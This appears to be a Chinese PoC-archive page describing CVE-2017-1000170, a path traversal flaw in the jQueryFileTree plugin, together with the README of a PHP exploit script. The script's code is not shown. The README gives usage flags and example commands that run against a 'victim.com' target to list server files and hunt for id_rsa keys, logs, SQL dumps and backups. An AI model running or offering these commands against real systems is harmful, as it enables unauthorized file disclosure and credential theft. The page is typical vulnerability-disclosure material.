POC详情: 312ea0c4ee5a589e3cfe9707595fd09c5261384b

来源
关联漏洞
标题: jqueryFileTree 路径遍历漏洞 (CVE-2017-1000170)
描述:jqueryFileTree是一个用jQuery的可配置的AJAX文件浏览器插件。 jqueryFileTree 2.1.5及之前的版本中存在路径遍历漏洞。攻击者可利用该漏洞查看系统上的任意文件。
描述
Jquery File Tree 1.6.6 Path Traversal exploit (CVE-2017-1000170)
介绍
# Jquery-File-Tree-1.6.6-Path-Traversal
Jquery File Tree 1.6.6 Path Traversal exploit (CVE-2017-1000170)

The jQueryFileTree <1.6.6 plugin for Wordpress default settings fail to parse the user data causing a path traversal vulnerability.

This allows an attacker to list all the filesnames of all readable folders of the webserver. 

Added to a local file inclusion or local file disclosure attack this can lead to arbitrarily download any readable file of the server.

# Usage

`$ xpl_jqueryFileTree.php -u url [-f extensions/filenames] [-p path] [-r] [-h] [-a]`

Legend:
```
  -h, --help: Show this message
  -u, --url: URL of target
  -a, --random-agent: Use random user agents
  -f, --filter: Name of files or extensions to search for (separated by comma)
  -p, --path: The full path from which the filenames will be read (default: /)
  -r, --recursive: Generates the tree recursivelly (be careful)

  e.g.: xpl_jqueryFileTree.php -u victim.com -f .zip,.sql -p /var/www/html/backup/admin/ -r
        |
         \-> This will search for all .zip and .sql files inside victim.com/backup/admin and its subpaths
             (You must provide the dot to indicate it's an extension)

        xpl_jqueryFileTree.php -u victim.com -f .log,id_rsa -a -r
        |
         \-> This will search for all files named "id_rsa" or having the extension
             ".log" within all folders of the server, with random user-agents

        Tip: use "php ..... | tee output" to save the result to an output file
```

![](https://i.imgur.com/K2ITuMg.png)
文件快照

[4.0K] /data/pocs/312ea0c4ee5a589e3cfe9707595fd09c5261384b ├── [1.5K] README.md └── [ 15K] xpl_jqueryFileTree.php 0 directories, 2 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。